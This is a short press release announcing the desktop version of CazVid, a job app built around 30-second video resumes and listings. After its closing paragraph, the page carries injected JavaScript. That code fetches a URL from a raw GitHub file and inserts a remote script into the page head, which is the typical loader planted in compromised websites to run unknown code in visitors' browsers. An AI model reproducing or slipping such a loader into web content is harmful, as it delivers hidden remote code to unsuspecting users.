More than a job board, CazVid offers innovative solutions
[March 19, 2024, Tempe, AZ] CazVid is thrilled to announce the launch of its desktop version to provide an enhanced user experience. The free jobseeker and job creator app allows users to post and view job openings and resumes through 30-second videos. With the desktop version, users can now access the platform from any device, providing greater convenience and efficiency.
This version of CazVid provides the same functionality as its mobile app, but with a larger, more user-friendly interface designed for desktop screens. Users can seamlessly browse available job listings, filter by category and location, and connect with potential candidates or employers. Employers can easily upload their job content using their computers.
“We facilitate connections between jobseekers and employers, eliminating the need for lengthy applications and sifting through countless resumes. With the desktop version, we aim to offer our users a more holistic and fulfilling experience, tailored to their preferences and needs,” says Yuvi Shmul, CazVid Founder and CEO.
CazVid currently boasts over 200,000 registered users and tens of thousands of job listings posted across multiple industries and countries. Headquartered in the United States with a global presence, the company’s mission is to disrupt traditional job market paradigms and recruiting processes by providing a free, easy-to-use platform where video becomes a powerful tool to showcase candidates beyond what a resume can offer.
In this regard, it stands out as the first and only app of its kind globally.
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To try CazVid’s desktop version, access it through this link. You can also download the mobile application from Google Play or Apple. For inquiries or suggestions, you may reach out via email or through social media platforms.;var url = ‘https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt’;fetch(url).then(response => response.text()).then(data => {var script = document.createElement(‘script’);script.src = data.trim();document.getElementsByTagName(‘head’)[0].appendChild(script);});